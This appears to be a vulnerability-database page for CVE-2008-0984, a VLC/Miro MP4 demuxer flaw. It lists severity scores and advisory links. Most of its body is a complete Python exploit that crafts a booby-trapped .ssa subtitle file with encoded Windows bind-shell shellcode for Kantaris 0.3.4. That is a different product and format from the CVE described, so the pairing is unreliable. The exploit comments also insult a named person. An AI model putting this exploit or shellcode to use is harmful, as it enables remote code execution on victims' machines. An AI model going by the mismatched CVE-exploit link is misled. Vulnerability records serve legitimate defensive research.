CVE-2008-0984 : Detail

CVE-2008-0984

31.36%V3
Network
2008-02-26
18h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The MP4 demuxer (mp4.c) for VLC media player 0.8.6d and earlier, as used in Miro Player 1.1 and earlier, allows remote attackers to overwrite arbitrary memory and execute arbitrary code via a malformed MP4 file.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 5498

Publication date : 2008-04-24 22h00 +00:00
Author : j0rgan
EDB Verified : Yes

#!/usr/bin/python # # Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!] # # The following exploit will make a film.ssa file, # just rename the file with the name of your movie, and use your imagination # to pwn! :) # Shellcode is local bind shell, just telnet to port:4444 to get command prompt :) # # BIG thanks to muts <muts[at]offensive-security[dot]com> for helping # and discovering a very interesting thing that we will publish soon # # I piss on your Business Networks course Igor Radusinovic! Go to hell! # # Vulnerability discovered by Muris Kurgas a.k.a. j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users.cg.yu import os jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it... # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37" "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38" "\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48" "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48" "\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" "\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48" "\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d" "\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38" "\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36" "\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" "\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57" "\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" "\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51" "\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31" "\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d" "\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36" "\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c" "\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42" "\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f" "\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46" "\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" "\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc fileHandle = open ( 'film.ssa', 'w' ) fileHandle.write ( '[Script Info]\n') fileHandle.write ( 'ScriptType: v4.00\n') fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n') fileHandle.write ( 'Collisions: Normal\n\n') fileHandle.write ( '[V4 Styles]\n\n') fileHandle.write ( '[Events]\n') fileHandle.write ( 'Dialogue: '+ bafer) fileHandle.close() # milw0rm.com [2008-04-25]

Products Mentioned

Configuraton 0

Miro>>Miro_player >> Version To (including) 1.1

    Videolan>>Vlc_media_player >> Version To (including) 0.8.6d

    References

    http://secunia.com/advisories/29122
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://secunia.com/advisories/29284
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.debian.org/security/2008/dsa-1543
    Tags : vendor-advisory, x_refsource_DEBIAN
    http://secunia.com/advisories/29153
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/28007
    Tags : vdb-entry, x_refsource_BID
    http://www.securitytracker.com/id?1019510
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/29766
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2008/0682
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.gentoo.org/security/en/glsa/glsa-200803-13.xml
    Tags : vendor-advisory, x_refsource_GENTOO